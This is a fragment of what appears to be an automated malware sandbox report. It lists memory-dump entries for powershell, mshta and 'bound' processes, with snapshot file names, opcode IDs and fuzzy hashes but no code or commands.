                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3dc84a4e5a8b4368e07ff36ffe9dbc9601d132d2d7246fcd467d3dfe1b5c610f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: aa0d408cb72c4523e2f1d1ac499207c7e76c9fc2c6f43bcf54b0574ebfea521b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dc84a4e5a8b4368e07ff36ffe9dbc9601d132d2d7246fcd467d3dfe1b5c610f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0B432A145498FD704FFBCE8A65EA37A0EF94319B084177E85CC71A6DE34A5448BC2
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2014004563.00007FFD9A420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A420000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a420000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ec7d16c115338f56a3891b329d589add60a10041ab74efa37b61df46972cfcb8
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0cc80b063f8363614151e2d9a8af4f3016ed0a11d83de49fcf1fc5c2014fbc60
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec7d16c115338f56a3891b329d589add60a10041ab74efa37b61df46972cfcb8
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F08232B0D5448FDB68EF8CE8558A877E0EF0532571500F6E15DCB5ABCA29EC54CB81
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: L_^$L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2894164595
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ec7380cbf694c6a67e99fafa0a0671d6f932f4378c861d3d8c658d88ebd2e2b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0fad8df557d6eef22a82a482a4df70746b90b4d8dc7df8aeaf4c55a7758313ca
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec7380cbf694c6a67e99fafa0a0671d6f932f4378c861d3d8c658d88ebd2e2b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E621A966A1D7C14FE36657B598B51A83FA05F92304F0D60FBD4F84B1E7E91C284E8352
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: L_^$L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2894164595
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 76c4aa4eed41d04eadbc94e7298b0c0de9041d7503e04077e76bd273214662e3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0551afbe4fe60e37389e3371f2178d196ba8fb9d48f9c9c1f23fe89f15e97e81
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76c4aa4eed41d04eadbc94e7298b0c0de9041d7503e04077e76bd273214662e3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF117263F0D7C28EE3564BB948B50A83FA06E9231471D54FBC0EC5B0A3E928A84BD351
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1031638419
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 64c0cd0706abcdbceec9a88389dbc203629f66a015df682c7d3560f889e88eee
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D21F177B184165ED3027BBDBC119EC7380DBD427A34891B3D768CB557DA14B08B8AE1
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2264858084
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0a6b2d79a9cd6008a787187f0ad5be232cf3c18e9405a890a5f555de5f83a8c7
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e2d3d46d96ed507fe8e5b65041df5f0034fb638af08822670f7187dcb396a84b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a6b2d79a9cd6008a787187f0ad5be232cf3c18e9405a890a5f555de5f83a8c7
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70017593F0D7D24AE35712BA08B90982FD09E93324B1E55FBD0EC5B0A3A915284BD351
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000003.1840060143.0000025A3A4A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025A3A4A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_3_25a3a4a0000_mshta.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9164435bee858f51dc12e1468b3b47a193d09d7d0cdc0233cc737549bf87df0a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D90020449581666D41451910C4A25C504063C8359FD445C09517A0144D49D02D61157
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: 8[8d
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-695392185
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bb7f7d7593fc18430975395fe89271af27eddbcd70e9b5e2ddfbe307be2f8c7f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f7aedfa2ad8add5c7bb247815f8c3640dd1c173e9494a322421c42f975968e0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb7f7d7593fc18430975395fe89271af27eddbcd70e9b5e2ddfbe307be2f8c7f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA71627190964A8FDB99EBA9C4A57FDBBF0FF59300F4444BEC049D71A2CA38A845CB00
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: h[8d
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3800029211
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 86c9d955d3d735f666b4415b6f407b53cf428a4307350607ba2090b158bb4f3c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5dffac5e8329f610e21e2783fae5b715e464098fcd763a7cfe2ca0c9ea44c7eb
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86c9d955d3d735f666b4415b6f407b53cf428a4307350607ba2090b158bb4f3c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70214C72E0D5894FEBA9DBA8883A3E57BE0EF59310F0800FDD489D32D6DD285D468740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bb5806bb177f1fdc1c004ecafd907250b0bcad70fa3fff19119aa9cb3f4687bf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 10530c47370c4d7ad1ffdc3fee65614702b385325c9cee1ad9f92390bd74ac5c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb5806bb177f1fdc1c004ecafd907250b0bcad70fa3fff19119aa9cb3f4687bf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54412A32E0D64A4FFBB8A6A888253F577E0EF59300F5401FDD48DD72E6DE3868468681
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 09064f58c254d955bf43755479458f873f58164b327397422093290d2d50cf13
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9548f15ac7f582fa4cb834d3499e28afe46771d8c31c7385482b6499dd7a42fd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09064f58c254d955bf43755479458f873f58164b327397422093290d2d50cf13
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93314631A186498FDBA8EF64C890BE9B3A1FF49304F9005EDD41DC7286CF35A992CB40
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 405ccffb28e4090469dbe77b45a360b0325496570c76c4874d92818691fe8493
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 35cc34348edbf7acff8a5b7701b0f44a87dcdad362419c683ca3e85d9a3e0871
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 405ccffb28e4090469dbe77b45a360b0325496570c76c4874d92818691fe8493
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF212A71E0860A9FDB58EF94C4A55FE77B1EF54301F5000BAE419D7296CF35A941CB90
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: acca100d0ea053bad37307adc9e1c80b4e9907fcb3f9b38e955eb0255b40d376
                                                                                                                                                                                                                                                                                                                        • Instruction ID: faca3ebc3240a9d25a1c09e9b0130b9ddf3dbb273197e2049a787b2e0dedaba9
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acca100d0ea053bad37307adc9e1c80b4e9907fcb3f9b38e955eb0255b40d376
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5115C72E0D54D5FEBB8EAA488256F97BE0EF59300F0801FDD48DD32D6DD2859458740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0eb1057f0bb58fb0b9fbd9b58336f8f42a053f7b856e3e3da00d3f36bd8b50d8
                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd5c90726c13cfeab7934ef848e90bffbd5101d5c16dfabb0707ac25f4b7684a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0eb1057f0bb58fb0b9fbd9b58336f8f42a053f7b856e3e3da00d3f36bd8b50d8
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0921F971E18A0E9FEB58EF94C4655FE77B1EF54301F5000BDE419D62A5CE35A940CB90
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a0a3c35fc931e9ed29f3820c3dafb2b4cc229fab29183e6a6b85713ff53878b8
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f6e2930b7a3ee50179657d3508ea17aff4a35f5e3a402f8536719b0eef5777e8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0a3c35fc931e9ed29f3820c3dafb2b4cc229fab29183e6a6b85713ff53878b8
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A11F370A14A4D8FDB98DF18C894BE9B7B1FF58304F5005E9D81DC7286CB75A992CB40
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c805ce76bbc8dde30dfbb94dc79e79f17786d04cc4be455ea4dce8ab50395142
                                                                                                                                                                                                                                                                                                                        • Instruction ID: af01dab4fd9d92d5b3801fd85a2c1537e59fa794944855138b503a21cb0b78ec
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c805ce76bbc8dde30dfbb94dc79e79f17786d04cc4be455ea4dce8ab50395142
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8111C749096588FDB94EB38C899BA9BBB1FF15304F0045EAD00DD72A6CE349D80CB01
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 94b86bb6fb89551256c177c6c744c845cb587ba5c5e221721f04f4e5e62f2866
                                                                                                                                                                                                                                                                                                                        • Instruction ID: eacf8e699116a889165db2ec6d691f857c96f9cd895eed0033843ad3913bbd9d
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94b86bb6fb89551256c177c6c744c845cb587ba5c5e221721f04f4e5e62f2866
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 551106749096598FDB94EB28C899BA8B7B1EF15304F4045EAD40CD72A5CE34AD80DB00
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 10c8fffbaacaba19584bdb3322a5a779aefee0cb4654c1c7fbaf4769fa5ea82e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0d9d970d24579ff33955fdbc05d6d9f298e39bb166f944a4e5376db468223f11
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10c8fffbaacaba19584bdb3322a5a779aefee0cb4654c1c7fbaf4769fa5ea82e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59015E30A0895D8FDB94EB28C8A9BA9B7F1FF1A300F4444E5C44CD72A2CE346C86CB40
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 501a06837db5ed9531ee3fdf7b84f8e2dec223fa36038f891f4b04b1d49b68bf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0881fda67f2a83dec65c89b6207e563ccc4d7772b0556807348641bce5c0ce7d
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 501a06837db5ed9531ee3fdf7b84f8e2dec223fa36038f891f4b04b1d49b68bf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F03A31E0D60D8EEBACEAA4C466BECB2B1EF55300F5001FDD25ED22E1DE3559818A80
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6b588b67fd3d5b6c39ca94523d991444fc4f8d39b6083db6af49ed51c11903a8
                                                                                                                                                                                                                                                                                                                        • Instruction ID: de45a7928e0b74d95fec9e9188cac71b15fe6d774f644e7de1fcee2538bcfca5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b588b67fd3d5b6c39ca94523d991444fc4f8d39b6083db6af49ed51c11903a8
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE04FB49096995FC750DFA888A92FABBF0FF15200F0444FEC448E72A1CA7019849B00
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 81ba5aa296160211717bd65f08ffcfc930938ba2dabecb487ecdef32838b2e13
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 56fd6c5ba9f12e4caa41ea05a645dd220113895cf0cb531309832b95fc674d25
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81ba5aa296160211717bd65f08ffcfc930938ba2dabecb487ecdef32838b2e13
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5D02B20E6D1990EC385E73488341A9BFA0AF05004F0480FCC09DE70E3CC1068858341
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 0000002E.00000002.2115664923.00007FFD9A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A410000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_46_2_7ffd9a410000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c07d88a09609a8de5e95970f1f3caa0b4e430a687028132def3282a672eee33d
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b6b2e551d9c3c21c895e18ef9a6994a392808fcfe8d96f75b8b89a8a5320cd39
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c07d88a09609a8de5e95970f1f3caa0b4e430a687028132def3282a672eee33d
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4222322B0DAC94FE7AA9B7C48745B57BE1EF96210B1800FFD09DC71D7E918A806C342
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 0000002E.00000002.2114299390.00007FFD9A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A340000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_46_2_7ffd9a340000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: ^$^
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3830990845
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ee63e05b38f2bd05d46076681c02ac3571f42f2fa28d203f14b664d4281edd6d
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b067df4e6483f055797ba23ab296d8fd3171982e09875567c732bc34f124f08c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee63e05b38f2bd05d46076681c02ac3571f42f2fa28d203f14b664d4281edd6d
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2A1E632E0DA8A8FE759EBACD8652ED7BF0EF46314F0441BED44997193CA296842C740
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 0000002E.00000002.2114299390.00007FFD9A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A340000, based on PE: false
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_46_2_7ffd9a340000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 49ae7e7125a853b966c89d4d90213ed285e878363835d8af4085bf37d8dc3cf8
